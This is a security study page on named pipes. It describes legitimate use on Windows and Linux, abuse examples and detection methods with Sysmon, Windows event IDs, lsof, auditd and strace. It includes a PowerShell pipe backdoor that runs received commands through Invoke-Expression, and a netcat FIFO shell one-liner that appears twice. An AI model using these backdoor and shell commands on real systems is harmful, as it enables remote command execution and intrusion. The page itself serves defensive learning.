Named Pipes - consoletornado.com

## Table of Contents - [[#What is a Named Pipe?|What is a Named Pipe?]] - [[#Windows Named Pipes|Windows Named Pipes]] - [[#Windows Named Pipes#Possible Legitimate Use|Possible Legitimate Use]] - [[#Possible Legitimate Use#Creating & Using a Named Pipe in PowerShell|Creating & Using a Named Pipe in PowerShell]] - [[#Windows Named Pipes#Abuse Example|Abuse Example]] - [[#Abuse Example#Using Named Pipes for Remote Code Execution|Using Named Pipes for Remote Code Execution]] - [[#Using Named Pipes for Remote Code Execution#Attacker creates a named pipe and executes commands through it (Cobalt Strike-style).|Attacker creates a named pipe and executes commands through it (Cobalt Strike-style).]] - [[#Using Named Pipes for Remote Code Execution#Client Process (Attacker’s Command Injection)|Client Process (Attacker’s Command Injection)]] - [[#Windows Named Pipes#Defending Against Named Pipe Attacks|Defending Against Named Pipe Attacks]] - [[#Defending Against Named Pipe Attacks#Detect Named Pipe Abuse with Sysmon|Detect Named Pipe Abuse with Sysmon]] - [[#Defending Against Named Pipe Attacks#Windows Event ID's to Hunt for if Sysmon not available|Windows Event ID's to Hunt for if Sysmon not available]] - [[#Windows Event ID's to Hunt for if Sysmon not available#1. Hunting for Suspicious Named Pipe Creation (4688)|1. Hunting for Suspicious Named Pipe Creation (4688)]] - [[#Windows Event ID's to Hunt for if Sysmon not available#2. Detecting Remote Named Pipe Access (5145)|2. Detecting Remote Named Pipe Access (5145)]] - [[#Windows Event ID's to Hunt for if Sysmon not available#3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663)|3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663)]] - [[#Windows Named Pipes#Summary|Summary]] - [[#Linux Named Pipes|Linux Named Pipes]] - [[#Linux Named Pipes#Legitimate Use|Legitimate Use]] - [[#Legitimate Use#Creating a Named Pipe (FIFO)|Creating a Named Pipe (FIFO)]] - [[#Linux Named Pipes#Abuse Example: Reverse Shell via a Named Pipe|Abuse Example: Reverse Shell via a Named Pipe]] - [[#Abuse Example: Reverse Shell via a Named Pipe#Attacker creates a named pipe for covert communication.|Attacker creates a named pipe for covert communication.]] - [[#Abuse Example: Reverse Shell via a Named Pipe#Attacker’s Side (Receiving Commands)|Attacker’s Side (Receiving Commands)]] - [[#Linux Named Pipes#Defending Against Named Pipe Attacks|Defending Against Named Pipe Attacks]] - [[#Defending Against Named Pipe Attacks#Linux: Find Open Named Pipes|Linux: Find Open Named Pipes]] - [[#Defending Against Named Pipe Attacks#Other Linux Tools for Detection|Other Linux Tools for Detection]] - [[#Linux Named Pipes#Locate Named Pipes on the System|Locate Named Pipes on the System]] - [[#Linux Named Pipes#Find Processes Using Named Pipes|Find Processes Using Named Pipes]] - [[#Find Processes Using Named Pipes#Example Output|Example Output]] - [[#Linux Named Pipes#Monitor Named Pipe Access in Real Time|Monitor Named Pipe Access in Real Time]] - [[#Monitor Named Pipe Access in Real Time#Example Alert|Example Alert]] - [[#Linux Named Pipes#Monitor Named Pipe Activity with auditd|Monitor Named Pipe Activity with auditd]] - [[#Monitor Named Pipe Activity with auditd#Enable auditing for named pipes|Enable auditing for named pipes]] - [[#Linux Named Pipes#Check logs later|Check logs later]] - [[#Linux Named Pipes#Trace Named Pipe Activity with strace|Trace Named Pipe Activity with strace]] - [[#Trace Named Pipe Activity with strace#Example Output (Suspicious Activity)|Example Output (Suspicious Activity)]] - [[#Linux Named Pipes#Detect Named Pipe-Based Reverse Shells|Detect Named Pipe-Based Reverse Shells]] - [[#Detect Named Pipe-Based Reverse Shells#Malicious Shell Example (Listener)|Malicious Shell Example (Listener)]] - [[#Detect Named Pipe-Based Reverse Shells#Detect Running Reverse Shell|Detect Running Reverse Shell]] - [[#Detect Named Pipe-Based Reverse Shells#Summary|Summary]] --- ## What is a Named Pipe? - A method for inter-process communication. - Same concept in both Windows and Linux environment but implemented slightly differently. **Essentially:** - A process creates a pipe and names it - Other processes can connect to that named pipe - Data communication/exchange occurs between those processes --- ## Windows Named Pipes ### Possible Legitimate Use - A SQL server may use named pipes as internal communication channels to communicate with local applications i.e. letting an application communicate with a database instance on the same machine. - This means that no network connections have to be made. - Tools like [[PsExec|PsExec]] are often abused however important to remember that PsExec is a Microsoft tool which legitimate use cases. It also uses named pipes to communicate with the created service over SMB. #### Creating & Using a Named Pipe in PowerShell ```powershell $pipeName = "\\.\pipe\MyPipe" $server = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName) Write-Host "Named Pipe Created: $pipeName" ``` This creates a named pipe called `MyPipe` that processes can use for inter-process communication. --- ### Abuse Example #### Using Named Pipes for Remote Code Execution ##### Attacker creates a named pipe and executes commands through it (Cobalt Strike-style). ```powershell [System.IO.Pipes.NamedPipeServerStream]$pipe = New-Object System.IO.Pipes.NamedPipeServerStream("evilpipe") while ($true) { $pipe.WaitForConnection() $reader = New-Object System.IO.StreamReader($pipe) $cmd = $reader.ReadLine() Invoke-Expression $cmd $pipe.Disconnect() } ``` - **What happens?** - The script waits for a command over the pipe `evilpipe`, executes it, then resets. - An **attacker** can send commands secretly via this pipe. ##### Client Process (Attacker’s Command Injection) ```powershell $pipe = New-Object System.IO.Pipes.NamedPipeClientStream(".", "evilpipe", "InOut") $writer = New-Object System.IO.StreamWriter($pipe) $writer.WriteLine("whoami") # Runs 'whoami' on the compromised system $writer.Flush() $writer.Close() ``` - **Impact:** Attackers use named pipes for **stealthy command execution**, often avoiding detection. --- ### Defending Against Named Pipe Attacks #### Detect Named Pipe Abuse with Sysmon ```powershell Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=17,18} | Select -First 10 ``` - Monitors named pipe creation and access attempts. #### Windows Event ID's to Hunt for if Sysmon not available | **#** | **Event ID** | **Log Source** | **Description** | **Use Case** | | ----- | ------------ | -------------- | --------------------- | ---------------------------------------------------------------- | | **1** | 4688 | Security | Process Creation | Identify suspicious processes creating/accessing named pipes. | | **2** | 5145 | Security | Object Access via SMB | Detect remote access to named pipes over SMB (Lateral Movement). | | **3** | 4656 | Security | Handle Request | Track attempts to access named pipes (who accessed what). | | **4** | 4658 | Security | Handle Closed | Shows when access to a named pipe is closed. | | **5** | 4663 | Security | Object Access | Detects interaction with a specific named pipe. | ##### 1. Hunting for Suspicious Named Pipe Creation (4688) Track processes that create named pipes - (e.g., `cmd.exe`, `powershell.exe`, `rundll32.exe`). **PowerShell Example (Event Viewer Query)** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Select-Object -First 10 ``` **Example Suspicious Entry** ```powershell New Process Name: C:\Windows\System32\cmd.exe Command Line: cmd.exe /c \\.\pipe\evilpipe ``` **Why it matters:** A named pipe with a **non-standard name** (e.g., `evilpipe`) could be a backdoor. --- ##### 2. Detecting Remote Named Pipe Access (5145) - Tracks **remote access to named pipes over SMB**. **PowerShell Query:** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Select-Object -First 10 ``` **Look for suspicious named pipes like:** ```powershell Object Name: \PIPE\samr Object Name: \PIPE\lsarpc ``` **Why it matters:** - `\PIPE\samr` and `\PIPE\lsarpc` are used in Pass-the-Hash (PTH) attacks. - Attackers use these to query domain info or escalate privileges. --- ##### 3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663) - These **track access to named pipes**, showing **who opened/closed them**. **Example PowerShell Query for Named Pipe Access (4656, 4663)** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} | Select-Object -First 10 ``` **Example Log Entry:** ```powershell Subject: User: ATTACKER-PC\attacker Object Name: \PIPE\evil_pipe Access: ReadData (or WriteData) ``` **Why it matters:** - Shows **which user or process accessed a pipe**. - If a low-privilege user is accessing a **SYSTEM-level** pipe, this could indicated **privilege escalation**. --- ### Summary - Attackers use named pipes for **lateral movement & execution** - (e.g., Cobalt Strike, Mimikatz, [[PsExec|PsExec]]). - **Detection:** Monitor Sysmon and Windows Event logs to spot potential abuse. - If **Sysmon isn’t available**, use **Windows Event Logs**: - **4688** → Process creation (hunt for processes making named pipes). - **5145** → Remote named pipe access via SMB (lateral movement). - **4656, 4658, 4663** → Object access logs (track who accessed what pipes). - **Hunt for unusual pipes** (e.g., `evilpipe`, `remcom`, `spoolss`). - **Correlate events** to spot abuse (e.g., `4688` + `5145` = remote execution via named pipes). --- ## Linux Named Pipes ### Legitimate Use - May be used for logging or monitoring. - Logs data to named pipe which is then read by logging or monitoring that named pipe. #### Creating a Named Pipe (FIFO) ```bash mkfifo /tmp/mypipe echo "Hello, Pipe!" > /tmp/mypipe & cat /tmp/mypipe ``` - Creates a named pipe `/tmp/mypipe`, writes to it, and then reads its contents. --- ### Abuse Example: Reverse Shell via a Named Pipe #### Attacker creates a named pipe for covert communication. ```bash mkfifo /tmp/backpipe nc -lvp 4444 0</tmp/backpipe | /bin/bash > /tmp/backpipe 2>&1 ``` - **What happens?** - A named pipe (`backpipe`) is used to send and receive commands in a reverse shell. - [[Netcat|Netcat]] (`nc`) listens for incoming commands and executes them, sending output back through the pipe. #### Attacker’s Side (Receiving Commands) ```bash nc <TARGET_IP> 4444 whoami ``` - **Impact:** Attackers use named pipes to **bypass security tools**, making malicious activity harder to detect. --- ### Defending Against Named Pipe Attacks #### Linux: Find Open Named Pipes ```bash # Lists named pipes in '/tmp', a common attack location. ls -l /tmp | grep "p" # Finds active processes using named pipes ('FIFO') lsof | grep FIFO ``` - When using `ls -l` Named Pipes are indicated in the output as starting with the character `p` for it's filetype which is why we grep for it. #### Other Linux Tools for Detection |**Tool/Command**|**Usage**|**Relevance to Named Pipes**| |---|---|---| |`ls -l`|List files|Identifies FIFO pipes (`p` in file type).| |`find`|Search files|Locates named pipes across the system.| |`lsof`|List open files|Shows processes using named pipes.| |`inotifywait`|File monitoring|Detects when named pipes are created/accessed.| |`auditd`|Kernel audit logs|Logs named pipe access (better for security monitoring).| |`ps aux`|Process monitoring|Checks for processes interacting with pipes.| |`strace`|System call tracing|Traces syscalls related to named pipes.| ### Locate Named Pipes on the System ```bash find / -type p 2>/dev/null ``` - Searches for **all named pipes** (`p` type files) on the system. **Example Output:** ```bash /tmp/malicious_pipe /var/run/docker.sock ``` - **Red Flags:** - Named pipes in `/tmp/` or `/dev/shm/` - Often used for malware & persistence (web shells). --- ### Find Processes Using Named Pipes ```bash lsof | grep FIFO ``` - Lists processes currently using named pipes. #### Example Output ```bash bash 1234 user 3w FIFO 0,10 0 /tmp/malicious_pipe ```` - **Red Flags:** **Unexpected** processes (e.g., `nc`, `bash`, `python`) using FIFOs. --- ### Monitor Named Pipe Access in Real Time ```bash inotifywait -m /tmp --format '%w%f %e' -e create ``` - Watches `/tmp` for **new named pipes** being created. #### Example Alert ```bash /tmp/evilpipe CREATE ``` - **Red Flags:** Pipes created dynamically in common attack directories (`/tmp`, `/dev/shm`). --- ### Monitor Named Pipe Activity with auditd #### Enable auditing for named pipes ```bash auditctl -w /tmp/ -p rwxa -k named_pipe_monitor ``` - Logs **read, write, execute, and attribute changes** in `/tmp/`. ### Check logs later ```bash ausearch -k named_pipe_monitor ``` - **Red Flags:** Unexpected access to named pipes by non-root users. --- ### Trace Named Pipe Activity with strace ```bash strace -e trace=open,read,write -p <PID> ``` - Attaches to a **process ID (PID)** and monitors **named pipe interactions**. #### Example Output (Suspicious Activity) ```lua open("/tmp/backpipe", O_WRONLY) = 3 write(3, "whoami", 6) ``` - **Red Flags:** Pipes being used for **command injection or reverse shells**. --- ### Detect Named Pipe-Based Reverse Shells #### Malicious Shell Example (Listener) ```bash mkfifo /tmp/backpipe nc -lvp 4444 0</tmp/backpipe | /bin/bash > /tmp/backpipe 2>&1 ``` - Attacker creates a **named pipe for remote command execution**. #### Detect Running Reverse Shell ```bash ps aux | grep nc lsof -i :4444 ``` - **Red Flags:** - Netcat (`nc`) listening with a **pipe as input/output**. - Unknown users running **bash via FIFO pipes**. --- #### Summary - Named pipes can be used for **reverse shells & data exfiltration**. - **Detection:** Monitor FIFO files to spot abuse. | **Action** | **Command** | **Why?** | | -------------------------------------- | ------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | | **Find Named Pipes** | `find / -type p` | Identifies FIFO files across the system. | | **List Processes Using Named Pipes** | `lsof \| grep FIFO` | Detects active processes interacting with named pipes. | | **Monitor Pipe Creation in Real-Time** | `inotifywait -m /tmp -e create` | Detects new pipes in suspicious locations. | | **Audit Named Pipe Activity** | `auditctl -w /tmp/ -p rwxa -k named_pipe_monitor` | Tracks who accessed named pipe for forensic analysis. | | **Trace Pipe Interaction** | `strace -e open,read,write -p <PID>` | Catches command execution via named pipes. | | **Detect Reverse Shells** | `ps aux \| grep nc \| lsof -i :4444` | Finds named pipe-based backdoors & reverse shells.<br>Checks for Netcat and other tools listening for remote commands. |